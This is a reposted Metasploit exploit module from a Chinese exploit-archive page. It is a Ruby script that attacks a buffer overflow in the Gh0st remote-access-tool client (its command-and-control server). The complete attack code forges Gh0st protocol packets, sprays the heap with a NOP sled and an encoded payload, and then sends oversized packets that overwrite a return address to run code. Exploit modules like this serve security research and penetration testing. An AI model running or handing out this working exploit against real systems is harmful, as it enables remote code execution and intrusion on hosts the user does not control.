Gh0st Client - Buffer Overflow (Metasploit)

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Gh0st Client - Buffer Overflow (Metasploit)

来源：metasploit.com 作者：Professor 发布时间：2017-09-08

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'zlib'

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp

def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Gh0st Client buffer Overflow',
      'Description'    => %q{
          This module exploits a Memory buffer overflow in the Gh0st client (C2 server)
      },
      'Author'         => 'Professor Plum',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'AllowWin32SEH' => true
        },
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => '',
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed
        },
      'Platform'       => 'win',
      'DisclosureDate' => 'Jul 27 2017',
      'Targets'        =>
        [
          ['Gh0st Beta 3.6', { 'Ret' => 0x06001010 }]
        ],
      'Privileged'     => false,
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('MAGIC', [true, 'The 5 char magic used by the server', 'Gh0st']),
        Opt::RPORT(80)
      ]
    )
end

def make_packet(id, data)
    msg = id.chr + data
    compressed = Zlib::Deflate.deflate(msg)
    datastore['MAGIC'] + [13 + compressed.size].pack('V') + [msg.size].pack('V') + compressed
end

def validate_response(data)
    if data.nil?
      print_status('Server closed connection')
      return false
    end
    if data.empty?
      print_status('No response recieved')
      return false
    end
    if data.size < 13
      print_status('Invalid packet')
      print_status(data)
      return false
    end
    mag, pktlen, msglen = data[0..13].unpack('a' + datastore['MAGIC'].size.to_s + 'VV')
    if mag.index(datastore['MAGIC']) != 0
      print_status('Bad magic: ' + mag[0..datastore['MAGIC'].size])
      return false
    end
    if pktlen != data.size
      print_status('Packet size mismatch')
      return false
    end
    msg = Zlib::Inflate.inflate(data[13..data.size])
    if msg.size != msglen
      print_status('Packet decompress failure')
      return false
    end
    return true
end

def check
    connect
    sock.put(make_packet(101, "\x00")) # heartbeat
    if validate_response(sock.get_once || '')
      return Exploit::CheckCode::Appears
    end
    Exploit::CheckCode::Safe
end

def exploit
    print_status("Trying target #{target.name}")
    print_status('Spraying heap...')
    for i in 0..100
      connect
      sock.put(make_packet(101, "\x90" * 3 + "\x90\x83\xc0\x05" * 1024 * 1024 + payload.encoded))
      if not validate_response(sock.get_once)
        disconnect
        return
      end
    end

    for i in 103..107
      print_status("Trying command #{i}...")
      begin
        connect
        sploit = make_packet(i, "\0" * 1064 + [target['Ret'] - 0xA0].pack('V') + 'a' * 28)
        sock.put(sploit)
        if validate_response(sock.get_once)
          next
        end
        sleep(0.1)
        break
      rescue EOFError
        print_status('Invalid')
      end
    end
    handler
    disconnect
end
end

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告